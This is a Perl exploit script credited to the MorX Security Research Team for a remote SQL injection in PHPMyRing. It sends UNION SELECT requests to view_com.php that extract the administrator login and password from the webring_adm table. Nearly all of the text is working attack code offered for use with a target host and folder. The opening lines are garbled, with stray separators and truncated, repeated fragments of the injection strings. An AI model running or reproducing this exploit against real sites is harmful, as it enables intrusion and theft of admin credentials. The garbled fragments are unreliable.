#######################################################################
---------[/code]
#===========
#===========
#===========
#===========
adm%20FROM%20webring_adm
dm%20FROM%20webring_adm
o%20FROM%20webring%20WHERE%20idsite=[victimesiteid]
0FROM%20webring%20WHERE%20idsite=[victimesiteid]
use IO::Socket;
if(!defined($ARGV[0] && $ARGV[1])) {
system (clear);
print "\n";
print "#################################################\n";
print "# PHPMyRing's Remote SQL injection Exploit #\n";
print "# Discovered by simo64_at_morx_org #\n";
print "# Script writting by simo_at_morx_org #\n";
print "# MorX Security Research Team #\n";
print "# www.morx.org #\n";
print "#################################################\n\n";
print "— Usage: perl $0 <host> <folder>\n";
print "— Example: perl $0 127.0.0.1 afd_webring\n\n";
exit; }
$TARGET = $ARGV[0];
$FOLDER = $ARGV[1];
$PORT = "80";
$SCRIPT = "/view_com.php?idsite=";
$SQLPASS = "-1%20UNION%20SELECT%20passadm%20FROM%20webring_adm";
$SQLADMIN = "-1%20UNION%20SELECT%20loginadm%20FROM%20webring_adm";
########################################################################
########
$COMMAND1 = "GET /$FOLDER$SCRIPT$SQLADMIN HTTP/1.1";
$COMMAND2 = "Host: $TARGET";
$COMMAND3 = "Connection: Close";
$COMMAND4 = "GET /$FOLDER$SCRIPT$SQLPASS HTTP/1.1";
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET",PeerPort=>"$PORT"
)
|| die "Can't connect to $TARGET";
print "#################################################\n";
print "# PHPMyRing's Remote SQL injection Exploit #\n";
print "# Discovered by simo64_at_morx_org #\n";
print "# Script writting by simo_at_morx_org #\n";
print "# MorX Security Research Team #\n";
print "# www.morx.org #\n";
print "#################################################\n\n";
sleep 2;
print "[*] Trying to get the admin login …\n\n";
print $remote "$COMMAND1\n$COMMAND2\n$COMMAND3\n\n";
while ($result = <$remote> ) {
if ($result =~ /site (.*?)</ ) {
$adminlogin = $1;
print "[+] your admin login is –> $adminlogin\n\n";
$a = 1;
}
}
if ($a == 0)
{
print "[-] Failed, cant get the admin login\n\n";
print "[*] Trying to get the admin password …\n\n";
}
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET",PeerPort=>"$PORT"
)
|| die "Can't connect to $TARGET";
print $remote "$COMMAND4\n$COMMAND2\n$COMMAND3\n\n";
while ($result2 = <$remote> ) {
if ($result2 =~ /site (.*?)</ ) {
$adminpass = $1;
print "[+] your admin pass is –> $adminpass\n\n";
$b = 1;
}
}
if ($b == 0)
{ print "[-] Failed, cant get the admin password\n";
}
$remote->flush();
close($remote);
exit;